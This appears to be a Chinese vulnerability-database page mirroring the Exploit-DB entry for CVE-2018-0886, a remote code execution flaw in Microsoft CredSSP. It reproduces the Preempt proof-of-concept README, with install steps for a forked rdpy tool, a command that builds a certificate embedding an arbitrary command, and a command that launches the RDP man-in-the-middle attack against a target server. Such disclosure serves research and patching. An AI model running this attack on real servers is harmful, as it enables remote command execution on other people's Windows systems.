漏洞概要

漏洞标题:
Microsoft Credential Security Support Provider – Remote Code Execution

提交时间:
2018-04-13

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 15 人关注

漏洞详情

EDB-ID: 44453 Author: Preempt Published: 2018-04-13
CVE:
CVE-2018-0886
Type: Remote Platform: Windows
Aliases:
N/A
Advisory/Source: Link Tags:
N/A

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
# credssp

This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay. 


Written by Eyal Karni, Preempt 
ekarni@preempt.com 

# Build

## Instructions (Linux)
If you are using Ubuntu 14 , check the install file.. 
It was tested on Ubuntu 16.04. 

```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```

EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip

* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).  
* A different version of openssl needed to be installed for this to run successfully.  The install script does that. 
* Please follow the instructions in the described order. 

# Running the exploit 


Export a certificate suitable for Server Authentication from any domain.


To generate a suitable certificate for the command to execute : 

```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 
```

(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)

To run the attack script: 

```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```

More details are in the usage section of the scripts(--help).

发表评论

电子邮件地址不会被公开。 必填项已用*标注